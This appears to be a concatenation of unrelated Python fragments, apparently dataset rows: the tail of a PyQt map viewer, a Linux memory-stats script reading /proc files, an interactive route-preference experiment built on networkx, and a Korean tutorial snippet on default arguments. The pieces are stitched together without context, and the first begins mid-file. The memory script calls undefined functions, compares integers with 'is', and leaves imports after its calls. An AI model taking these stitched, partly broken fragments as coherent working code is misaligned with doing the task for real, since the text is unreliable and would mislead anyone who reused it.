}
open('img.png', 'wb').write(requests.get(static_server, params=params).content)
self.img.setPixmap(QtGui.QPixmap('img.png'))
def keyPressEvent(self, event: QtGui.QKeyEvent) -> None:
if event.key() == Qt.Key_PageUp:
if self.spn * 2 < 2:
self.spn *= 2
self.z -= 1
elif event.key() == Qt.Key_PageDown:
if self.spn / 2 > 0.00175:
self.spn /= 2
self.z += 1
elif event.key() == Qt.Key_Left:
self.maindot += [-self.spn * 2, 0]
elif event.key() == Qt.Key_Right:
self.maindot += [self.spn * 2, 0]
elif event.key() == Qt.Key_Up:
self.maindot += [0, self.spn]
elif event.key() == Qt.Key_Down:
self.maindot += [0, -self.spn]
self.get_img()
def except_hook(cls, exception, traceback):
sys.__excepthook__(cls, exception, traceback)
if __name__ == '__main__':
app = QApplication(sys.argv)
form = Ui_MainWindow()
form.setupUi(form)
form.init2()
form.show()
sys.excepthook = except_hook
sys.exit(app.exec())
|
#!/usr/bin/env python3
from os import getpid
# find mem_total
# find positions of SwapFree and SwapTotal in /proc/meminfo
with open('/proc/meminfo') as f:
mem_list = f.readlines()
mem_list_names = []
for s in mem_list:
mem_list_names.append(s.split(':')[0])
if mem_list_names[2] != 'MemAvailable':
errprint('WARNING: Your Linux kernel is too old, Linux 3.14+ requied')
# exit(1)
swap_total_index = mem_list_names.index('SwapTotal')
swap_free_index = swap_total_index + 1
mem_total = int(mem_list[0].split(':')[1][:-4])
# Get names from /proc/*/status to be able to get VmRSS and VmSwap values
with open('/proc/self/status') as file:
status_list = file.readlines()
status_names = []
for s in status_list:
status_names.append(s.split(':')[0])
ppid_index = status_names.index('PPid')
vm_size_index = status_names.index('VmSize')
vm_rss_index = status_names.index('VmRSS')
vm_swap_index = status_names.index('VmSwap')
uid_index = status_names.index('Uid')
state_index = status_names.index('State')
try:
anon_index = status_names.index('RssAnon')
file_index = status_names.index('RssFile')
shmem_index = status_names.index('RssShmem')
detailed_rss = True
# print(detailed_rss, 'detailed_rss')
except ValueError:
detailed_rss = False
# print('It is not Linux 4.5+')
self_pid = str(getpid())
def self_rss():
r = pid_to_status(self_pid)[5]
print(r)
def pid_to_status(pid):
"""
"""
try:
with open('/proc/' + pid + '/status') as f:
for n, line in enumerate(f):
if n is 0:
name = line.split('\t')[1][:-1]
if n is state_index:
state = line.split('\t')[1][0]
continue
if n is ppid_index:
ppid = line.split('\t')[1][:-1]
continue
if n is uid_index:
uid = line.split('\t')[2]
continue
if n is vm_size_index:
vm_size = int(line.split('\t')[1][:-4])
continue
if n is vm_rss_index:
vm_rss = int(line.split('\t')[1][:-4])
continue
if n is vm_swap_index:
vm_swap = int(line.split('\t')[1][:-4])
break
return name, state, ppid, uid, vm_size, vm_rss, vm_swap
except UnicodeDecodeError:
return pid_to_status_unicode(pid)
except FileNotFoundError:
return None
except ProcessLookupError:
return None
except ValueError:
return None
self_rss()
import logging
import subprocess
import argparse
self_rss()
|
__author__ = 'Justin'
import os
import sys
import json
import networkx as nx
from WeightFunction import weightfunction
from PathSimilarity import pathSimilarity as PS
from numpy import std,linspace,argsort,array,linspace,unique
from DisplayNetwork import networkdisplay
from GetRouteInfo import routeinfo
from GenRandomNodes import randomnodes
from ParetoFrontier import rand_paretofront
import matplotlib.pyplot as plt
from random import shuffle
import matplotlib.patches as mpatches
# DESCRIPTION: Generate Estimate of Factor Weight Error Distribution
#
# Initialize data
numweights = 20
weights = linspace(0,1,numweights)
weightchosen = {weight:0 for weight in weights}
uniquerange = [3,5]
numiter = 30
print('Enter your first name: ')
person = sys.stdin.readline()[0:-1]
# Load Network
cwd = os.getcwd()
filename = "OSMNetworkReducedSet.gexf"
filepath = os.path.abspath(os.path.join(cwd, '..', 'Project Data','Networks',filename))
fh=open(filepath,'rb')
G = nx.read_gexf(fh)
for _ in range(0,numiter,1):
# Generate Pareto Frontier
cluster_weights, paths, pathsinfo = rand_paretofront(G,weights,['Zenness','currenttime'],
uniquerange[0],uniquerange[1],'Zenness')
# Print Route Information
print('------------------------------------------------------------------------------')
print('/////////////////////////////////////////////////////////////////////////////')
Zenscore_pts = []
time_pts = []
for index,path in enumerate(paths):
print('---------------------------------------')
print('Route '+str(index)+':')
print('-time(min):',pathsinfo[index]['currenttime']/60)
print('-zenness:',pathsinfo[index]['Zenness'])
print('----------------')
print('-zen diff:',pathsinfo[0]['Zenness']-pathsinfo[index]['Zenness'])
print('-time diff:',(pathsinfo[index]['currenttime']-pathsinfo[0]['currenttime'])/60)
print('---------------------------------------')
Zenscore_pts.append(pathsinfo[index]['Zenness'])
time_pts.append(pathsinfo[index]['currenttime']/60)
# Plot All Route Options
routestyles=[]
listcolors = ['#cc9999','#ccff99','#999933','#ffcc99','#996633','#767777']
# listcolors = ['#ffff4d','#66ff66','#00cd00','#008b00','#006400','#cc9999','#ccff99','#999933']
patches = []
for index,color in enumerate(listcolors):
patch = mpatches.Patch(color=color, label='Route '+str(index))
patches.append(patch)
plt.legend(handles = patches)
plt.show()
for index in range(0,len(paths),1):
dict = {'color': listcolors[index],'width': 10,'name': 'Route '+str(index)+':'}
routestyles.append(dict)
Zen_std = std(nx.get_edge_attributes(G,'Zenness').values())
networkdisplay(G,routes=paths,graphstyle='RdYlBu_r',routestyles = routestyles,
weightstring='Zenness',normValue=6.0*Zen_std, title='Pareto Optimal Routes')
# # Plot Pareto Frontier
# fig,ax = plt.subplots()
# MIN = min(time_pts)
# time_pts[:]=[value/MIN for value in time_pts] # Normalize time to minimum value
# ax.scatter(Zenscore_pts,time_pts,s=10)
# plt.title('Pareto Frontier Example')
# plt.xlabel('Zenscores')
# plt.ylabel('Time Normalized to Fastest Route')
#
# for index,weightgroup in enumerate(cluster_weights):
# if(len(weightgroup)==1):
# a = "%.2f" % weightgroup[0]
# ax.annotate('['+a+']',(Zenscore_pts[index],time_pts[index]))
# else:
# a = "%.2f" % weightgroup[0]
# b = "%.2f" % weightgroup[-1]
# ax.annotate('['+a+'-'+b+']',(Zenscore_pts[index],time_pts[index]))
# plt.show()
# Get User Feedback:
print('Options:')
print('Enter you answer indicated by number 0-'+str(len(paths)-1)+'')
print('OR')
print("'s' for skip and 'r' for refine:")
choice = sys.stdin.readline()[0:-1]
if(choice == 'r'):
# Prune Options:
print('Options:')
print('Enter list separated by commas of choices to view')
print('Example => 1,2,3')
string = sys.stdin.readline()
chosenindices = [int(element) for index,element in enumerate(string) if(index % 2 == 0) ]
print('Chosen:',chosenindices)
# Plot All Chosen Options
routestyles=[]
for index in chosenindices:
dict = {'color': listcolors[index],'width': 10,'name': 'Route '+str(index)+':'}
routestyles.append(dict)
chosenpaths = [paths[i] for i in chosenindices]
chosenpathinfos = [paths[i] for i in chosenindices]
Zen_std = std(nx.get_edge_attributes(G,'Zenness').values())
networkdisplay(G,routes=chosenpaths,graphstyle='RdYlBu_r',routestyles = routestyles,
weightstring='Zenness',normValue=6.0*Zen_std, title='Pareto Optimal Routes')
# Get Refined User Feedback:
print('Options:')
print('Enter you answer indicated by number 0-'+str(len(paths)-1)+'')
print('OR')
print("'s' for skip and 'r' for refine:")
choice = sys.stdin.readline()[0:-1]
if(choice != 's'):
# Save contribution to weight error distribution
for weight in cluster_weights[int(choice)]:
weightchosen[weight] += 1
# Print Estimate of Factor Weight Error Distribution
fig,ax = plt.subplots()
x = sorted(weightchosen.keys())
y = [1.0-float(weightchosen[key])/float(numiter) for key in x]
ax.bar(x,y)
ax.set_xlim([0,1])
plt.title('Probability of Error vs. Zenweight')
plt.xlabel('Zenweight')
plt.ylabel('Prob. of Error')
plt.show()
# Save Information
folder = filepath = os.path.abspath(os.path.join(cwd, '..', 'Project Data',person,'GradientOptimization'))
filename = "ErrorDistribution3.json"
filepath = os.path.abspath(os.path.join(folder,filename))
with open(filepath, 'w') as outfile:
json.dump(y, outfile)
filename = "zenweights3.json"
filepath = os.path.abspath(os.path.join(folder,filename))
with open(filepath, 'w') as outfile:
json.dump(x, outfile)
# # Loop through weight values
# numweights = 5
# zenweights = linspace(0.1,0.4,numweights)
# shuffle(zenweights)
# iter_per_weight = 8
#
# errorProbs = []
#
# for zenweight in zenweights:
# #Generate Probability of Error
# choices = []
#
# #-- User Weight Testing Loop-----------------------------------------------------
# while(len(choices)<iter_per_weight):
# zenRoute = []
# fastestRoute = []
#
# pathsimilarity = 1.0
# maxsimilarity = 0.7
# # Keep searching if routes are similar
# while(pathsimilarity > maxsimilarity):
#
# # I) Generate Random Source and Destination
# lons = nx.get_node_attributes(G,'lon')
# lats = nx.get_node_attributes(G,'lat')
# origin,destination = randomnodes(G,distancelimit=1) # distancelimit in miles
#
# # II) Generate Best User-Weighted Route
#
# # Update Total Edge Weights
# timeweight = 1-zenweight
# weights = [zenweight,timeweight]
# keys = ['Zenness','currenttime']
# for edge in G.edges():
# nodeA = edge[0]
# nodeB = edge[1]
# dict = G[nodeA][nodeB]
# G[nodeA][nodeB]['weight'] = weightfunction(weights,dict,keys)
#
# # Djkistra's Shortest Path
# zenRoute = nx.shortest_path(G,source = origin,target = destination,weight = 'weight')
# zenRouteInfo = routeinfo(G,zenRoute,['currenttime','Zenness'])
#
# # III) Generate Fastest Route
#
# # Djkistra's Shortest Path
# fastestRoute = nx.shortest_path(G,source = origin,target = destination,weight = 'currenttime')
# fastestRouteInfo = routeinfo(G,fastestRoute,['currenttime','Zenness'])
#
# # Check Path Similarity
# pathsimilarity= PS(zenRoute,fastestRoute)
#
#
# # IV) Plot Network and Routes
# routestyles = [{'color': '#ccffcc','width': 20,'name': 'Zen Route'},
# {'color': '#ffff4d','width': 10,'name': 'Fastest Route'}] # greenish then yellowish
# Zen_std = std(nx.get_edge_attributes(G,'Zenness').values())
#
# networkdisplay(G,routes=[zenRoute,fastestRoute],graphstyle='RdYlBu_r',routestyles = routestyles,
# weightstring='Zenness',normValue=6.0*Zen_std, title='Example')
#
#
# # V) Print Route Information
# print('---------------------------------------')
# print('Source:',[lats[origin],lons[origin]])
# print('Destination',[lats[destination],lons[destination]])
# print('---------------------------------------')
# print('ZenRoute:')
# print('-time(min):',zenRouteInfo['currenttime']/60)
# print('-zenness:',zenRouteInfo['Zenness'])
# print('\n')
# print('FastestRoute:')
# print('-time(min):',fastestRouteInfo['currenttime']/60)
# print('-zenness:',fastestRouteInfo['Zenness'])
# print('---------------------------------------')
# print('ZenDiff: '+str(fastestRouteInfo['Zenness']-zenRouteInfo['Zenness']))
# print('TimeDiff(min): '+str(zenRouteInfo['currenttime']/60-fastestRouteInfo['currenttime']/60))
# print('---------------------------------------')
#
#
# # VI) Get User Feedback:
# print('Options:')
# print('1)Zen'); print('2)Fastest'); print('3)Skip')
# print('\nEnter you answer indicated by number 1-3:')
# choice = sys.stdin.readline()[0:-1]
# # VII) Update User Weight
# if(choice == '1'):
# choices.append(0)
# elif(choice == '2'):
# choices.append(1)
#
# #-- END User Weight Testing Loop-----------------------------------------------------
# print(choices)
# errorProb = float(sum(choices))/float(len(choices))
# errorProbs.append(errorProb)
# print(errorProb)
#
# # Resort Data
#
# indices = argsort(array(zenweights))
# zenweights.sort()
# errorProbs = [errorProbs[index] for index in indices]
#
# # Print Estimate of Factor Weight Error Distribution
#
# fig,ax = plt.subplots()
# ax.bar(zenweights,errorProbs)
# ax.set_xlim([0,1])
# plt.title('Probability of Error vs. Zenweight')
# plt.xlabel('Zenweight')
# plt.ylabel('Prob. of Error')
# plt.show()
#
# # Save Information
#
# folder = filepath = os.path.abspath(os.path.join(cwd, '..', 'Project Data','GradientOptimization'))
#
# filename = "ErrorDistribution2.json"
# filepath = os.path.abspath(os.path.join(folder,filename))
# with open(filepath, 'w') as outfile:
# json.dump(errorProbs, outfile)
#
# filename = "zenweights2.json"
# weights = zenweights.tolist()
# filepath = os.path.abspath(os.path.join(folder,filename))
# with open(filepath, 'w') as outfile:
# json.dump(weights, outfile)
|
def h(a, b=1, c=1):
return a * 100 + b * 10 + c
print(h(1, 2, 3)) # 인수 3개 모두 설정 => 123
print(h(2)) # 인수 하나만 지정(b, c는 기본값 사용) => 211
print(h(2, c=2)) # 첫 번째 인수와 c를 설정. b는 기본값 => 212
print(h(a=2, c=3)) # a값과 c값을 지정 => 213
print(h(b=2, a=1, c=3)) # 매개변수를 지정해 호출할 때는 순서가 상관없음 => 123 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.